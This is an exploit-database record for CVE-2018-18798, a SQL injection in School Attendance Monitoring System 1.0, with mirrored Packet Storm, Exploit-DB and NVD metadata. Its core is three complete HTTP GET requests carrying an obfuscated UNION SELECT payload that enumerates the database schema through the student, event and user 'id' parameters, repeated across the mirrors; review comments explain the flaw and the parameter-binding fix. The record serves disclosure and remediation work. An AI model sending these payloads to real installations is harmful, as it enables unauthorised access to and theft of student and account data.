ID 1337DAY-ID-31485
Type zdt
Reporter Ihsan Sencan
Modified 2018-10-31T00:00:00
Description
Exploit for php platform in category web applications: union-based SQL injection through the `id` GET parameter of three `index.php?view=view` handlers (student, event, user) in School Attendance Monitoring System 1.0, tracked as CVE-2018-18798 (NVD: CWE-89, CVSS 3.0 9.8 with AV:N/PR:N). Caveat for readers: the captured requests below carry a PHPSESSID cookie, and only response headers (200 OK) are shown, not bodies — whether the endpoints are reachable without a login, and the actual dumped output, are asserted by the author rather than demonstrated here.
# Exploit Title: School Attendance Monitoring System 1.0 - SQL Injection
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/attendancemonitoring.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18798
# POC:
# 1)
# http://localhost/[PATH]/student/index.php?view=view&id=[SQL]
# The [SQL] used in the request below closes the quoted id (-1') and appends a
# 14-column UNION SELECT (the column count must match the original query).
# Its second column walks information_schema.columns for database(), emitting
# "<nn>0=><table>" whenever the table changes and "<nn>=>Kolon: <column><br>"
# per column (0x4b6f6c6f6e3a20 = "Kolon: ", 0x3c62723e = "<br>"), so the whole
# schema is rendered into the page. The mixed-case keywords are cosmetic for
# MySQL (keywords are case-insensitive) and serve only as naive filter evasion.
#
#[PATH]/student/view.php
#01 <?php
#02 $student = New Student();
#   NOTE(review): $_GET['id'] is handed to select_student() with no cast,
#   allow-list or parameter binding; the query text itself lives in the
#   Student class and is not shown here. The PoC closes a quote (-1') and
#   appends a 14-column UNION, which indicates the value is interpolated
#   inside a quoted string literal. The fix belongs in select_student():
#   prepare the statement and bind id (PDO or mysqli). If ids are integers,
#   (int)$_GET['id'] at this call site is a cheap extra guard, but it does
#   not replace binding. index.php?view=view presumably includes this file
#   as a sub-view — confirm against index.php, which is not shown.
#03 $res = $student->select_student($_GET['id']);
#04
#05
#06 $course = New Course();
#   NOTE(review): CourseID comes from the row fetched above, not from the
#   request, so it is second-order input; single_course() (not shown) should
#   still bind it rather than interpolate it. What select_student() returns
#   when no row matches is not visible here — confirm that $res is an object
#   before this property read.
#07 $resCourse = $course->single_course($res->CourseID);
#08
#09 ?>
GET /[PATH]/student/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 19:37:01 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/event/index.php?view=view&id=[SQL]
# Same schema-walking UNION as PoC 1, but with 7 columns to match the
# event query's column count.
#
#[PATH]/event/view.php
#01 <?php
#02 $event = New Event();
#   NOTE(review): $_GET['id'] reaches single_event() unvalidated and unbound;
#   the query string is built inside the Event class, which is not shown.
#   The PoC's leading -1' plus a 7-column UNION indicates the value is
#   interpolated into a quoted literal. Fix single_event() to use a prepared
#   statement with id bound as a parameter; an (int) cast at this call site
#   is only a secondary guard and assumes ids are numeric — confirm.
#03 $res = $event->single_event($_GET['id']);
#04
#05
#06
#07 ?>
GET /[PATH]/event/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 17:12:15 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 3)
# http://localhost/[PATH]/user/index.php?view=view&id=[SQL]
# Same schema-walking UNION as PoC 1, again with 7 columns to match the
# user query's column count. Because this handler reads the user table,
# the same injection point can be pointed at credential columns once the
# schema has been enumerated.
#
#[PATH]/user/view.php
#01 <?php
#02 $user = New User();
#   NOTE(review): $_GET['id'] flows straight into single_user(); the query
#   is assembled in the User class (not shown). The PoC's -1' prefix and
#   7-column UNION indicate string interpolation into a quoted literal.
#   Fix single_user() with a prepared statement and bound id parameter;
#   casting to (int) here is only defence in depth and presumes numeric ids.
#   This handler sits in front of the user table, so a successful injection
#   here is the most direct route to account data — prioritise this fix.
#03 $res = $user->single_user($_GET['id']);
#04
#05
#06
#07 ?>
GET /[PATH]/user/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 17:16:52 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# 0day.today [2018-10-31] #
{"id": "1337DAY-ID-31485", "bulletinFamily": "exploit", "title": "School Attendance Monitoring System 1.0 - SQL Injection Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2018-10-31T00:00:00", "modified": "2018-10-31T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/31485", "reporter": "Ihsan Sencan", "references": [], "cvelist": ["CVE-2018-18798"], "type": "zdt", "lastseen": "2018-10-31T16:41:33", "edition": 1, "viewCount": 5, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2018-10-31T16:41:33", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-18798"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:150010"]}, {"type": "exploitdb", "idList": ["EDB-ID:45727"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:295868DCF7E82260F77E91018F176617"]}], "modified": "2018-10-31T16:41:33", "rev": 2}, "vulnersScore": 6.5}, "sourceHref": "https://0day.today/exploit/31485", "sourceData": "# Exploit Title: School Attendance Monitoring System 1.0 - SQL Injection\r\n# Exploit Author: Ihsan Sencan\r\n# Vendor Homepage: https://www.sourcecodester.com/users/janobe\r\n# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/attendancemonitoring.zip\r\n# Version: 1.0\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-18798\r\n \r\n# POC: \r\n# 1)\r\n# http://localhost/[PATH]/student/index.php?view=view&id=[SQL]\r\n# \r\n#[PATH]/student/view.php\r\n#01 <?php \r\n#02 $student = New Student();\r\n#03 $res = $student->select_student($_GET['id']);\r\n#04 \r\n#05 \r\n#06 $course = New Course();\r\n#07 $resCourse = $course->single_course($res->CourseID);\r\n#08 \r\n#09 ?>\r\nGET 
/[PATH]/student/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:[email\u00a0protected]_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%[email\u00a0protected]:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:[email\u00a0protected]%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2d%2d%20%2d HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3\r\nConnection: keep-alive\r\nHTTP/1.1 200 OK\r\nDate: Sun, 28 Oct 2018 19:37:01 GMT\r\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\r\nX-Powered-By: PHP/5.6.30\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\n \r\n# POC: \r\n# 2)\r\n# http://localhost/[PATH]/event/index.php?view=view&id=[SQL]\r\n# \r\n#[PATH]/event/view.php\r\n#01 <?php \r\n#02 $event = New Event();\r\n#03 $res = $event->single_event($_GET['id']);\r\n#04 \r\n#05 \r\n#06 \r\n#07 ?>\r\nGET 
/[PATH]/event/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:[email\u00a0protected]_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%[email\u00a0protected]:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:[email\u00a0protected]%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3\r\nConnection: keep-alive\r\nHTTP/1.1 200 OK\r\nDate: Sun, 28 Oct 2018 17:12:15 GMT\r\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\r\nX-Powered-By: PHP/5.6.30\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\n \r\n# POC: \r\n# 3)\r\n# http://localhost/[PATH]/user/index.php?view=view&id=[SQL]\r\n# \r\n#[PATH]/user/view.php\r\n#01 <?php \r\n#02 $user = New User();\r\n#03 $res = $user->single_user($_GET['id']);\r\n#04 \r\n#05 \r\n#06 \r\n#07 ?>\r\nGET 
/[PATH]/user/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:[email\u00a0protected]_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%[email\u00a0protected]:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:[email\u00a0protected]%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3\r\nConnection: keep-alive\r\nHTTP/1.1 200 OK\r\nDate: Sun, 28 Oct 2018 17:16:52 GMT\r\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\r\nX-Powered-By: PHP/5.6.30\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\n\n# 0day.today [2018-10-31] #", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:52:33", "description": "Attendance Monitoring System 1.0 has SQL Injection via the 'id' parameter to student/index.php?view=view, event/index.php?view=view, and user/index.php?view=view.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-03-21T16:00:00", "title": "CVE-2018-18798", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-18798"], "modified": "2019-03-28T17:35:00", "cpe": ["cpe:/a:school_attendance_monitoring_system_project:school_attendance_monitoring_system:1.0"], "id": "CVE-2018-18798", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18798", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:school_attendance_monitoring_system_project:school_attendance_monitoring_system:1.0:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2018-10-30T02:22:49", "description": "", "published": "2018-10-29T00:00:00", "type": "packetstorm", "title": "School Attendance Monitoring System 1.0 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-18798"], 
"modified": "2018-10-29T00:00:00", "id": "PACKETSTORM:150010", "href": "https://packetstormsecurity.com/files/150010/School-Attendance-Monitoring-System-1.0-SQL-Injection.html", "sourceData": "`# Exploit Title: School Attendance Monitoring System 1.0 - SQL Injection \n# Dork: N/A \n# Date: 2018-10-29 \n# Exploit Author: Ihsan Sencan \n# Vendor Homepage: https://www.sourcecodester.com/users/janobe \n# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/attendancemonitoring.zip \n# Version: 1.0 \n# Category: Webapps \n# Tested on: WiN7_x64/KaLiLinuX_x64 \n# CVE: CVE-2018-18798 \n \n# POC: \n# 1) \n# http://localhost/[PATH]/student/index.php?view=view&id=[SQL] \n# \n#[PATH]/student/view.php \n#01 <?php \n#02 $student = New Student(); \n#03 $res = $student->select_student($_GET['id']); \n#04 \n#05 \n#06 $course = New Course(); \n#07 $resCourse = $course->single_course($res->CourseID); \n#08 \n#09 ?> \nGET /[PATH]/student/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2d%2d%20%2d HTTP/1.1 \nHost: TARGET \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nCookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 \nConnection: keep-alive \nHTTP/1.1 200 OK \nDate: Sun, 28 Oct 2018 19:37:01 GMT \nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 \nX-Powered-By: PHP/5.6.30 \nExpires: Thu, 19 Nov 
1981 08:52:00 GMT \nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 \nPragma: no-cache \nKeep-Alive: timeout=5, max=100 \nConnection: Keep-Alive \nTransfer-Encoding: chunked \nContent-Type: text/html; charset=UTF-8 \n \n# POC: \n# 2) \n# http://localhost/[PATH]/event/index.php?view=view&id=[SQL] \n# \n#[PATH]/event/view.php \n#01 <?php \n#02 $event = New Event(); \n#03 $res = $event->single_event($_GET['id']); \n#04 \n#05 \n#06 \n#07 ?> \nGET /[PATH]/event/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1 \nHost: TARGET \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nCookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 \nConnection: keep-alive \nHTTP/1.1 200 OK \nDate: Sun, 28 Oct 2018 17:12:15 GMT \nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 \nX-Powered-By: PHP/5.6.30 \nExpires: Thu, 19 Nov 1981 08:52:00 GMT \nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 \nPragma: no-cache \nKeep-Alive: timeout=5, max=100 \nConnection: Keep-Alive \nTransfer-Encoding: chunked \nContent-Type: text/html; charset=UTF-8 \n \n# POC: \n# 3) \n# http://localhost/[PATH]/user/index.php?view=view&id=[SQL] \n# \n#[PATH]/user/view.php \n#01 <?php \n#02 $user = New User(); \n#03 $res = $user->single_user($_GET['id']); \n#04 \n#05 \n#06 \n#07 ?> \nGET 
/[PATH]/user/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1 \nHost: TARGET \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nCookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 \nConnection: keep-alive \nHTTP/1.1 200 OK \nDate: Sun, 28 Oct 2018 17:16:52 GMT \nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 \nX-Powered-By: PHP/5.6.30 \nExpires: Thu, 19 Nov 1981 08:52:00 GMT \nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 \nPragma: no-cache \nKeep-Alive: timeout=5, max=100 \nConnection: Keep-Alive \nTransfer-Encoding: chunked \nContent-Type: text/html; charset=UTF-8 \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150010/sams10-sql.txt"}], "exploitdb": [{"lastseen": "2018-11-30T12:31:32", "description": "", "published": "2018-10-29T00:00:00", "type": "exploitdb", "title": "School Attendance Monitoring System 1.0 - SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-18798"], "modified": "2018-10-29T00:00:00", "id": "EDB-ID:45727", "href": "https://www.exploit-db.com/exploits/45727", "sourceData": "# Exploit Title: School Attendance Monitoring System 1.0 - SQL Injection\r\n# Dork: N/A\r\n# Date: 2018-10-29\r\n# Exploit Author: Ihsan Sencan\r\n# Vendor Homepage: https://www.sourcecodester.com/users/janobe\r\n# Software Link: 
https://www.sourcecodester.com/sites/default/files/download/janobe/attendancemonitoring.zip\r\n# Version: 1.0\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-18798\r\n\r\n# POC: \r\n# 1)\r\n# http://localhost/[PATH]/student/index.php?view=view&id=[SQL]\r\n# \r\n#[PATH]/student/view.php\r\n#01 <?php \r\n#02 $student = New Student();\r\n#03 $res = $student->select_student($_GET['id']);\r\n#04 \r\n#05 \r\n#06 $course = New Course();\r\n#07 $resCourse = $course->single_course($res->CourseID);\r\n#08 \r\n#09 ?>\r\nGET /[PATH]/student/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2d%2d%20%2d HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3\r\nConnection: keep-alive\r\nHTTP/1.1 200 OK\r\nDate: Sun, 28 Oct 2018 19:37:01 GMT\r\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\r\nX-Powered-By: PHP/5.6.30\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n# POC: \r\n# 2)\r\n# http://localhost/[PATH]/event/index.php?view=view&id=[SQL]\r\n# \r\n#[PATH]/event/view.php\r\n#01 <?php 
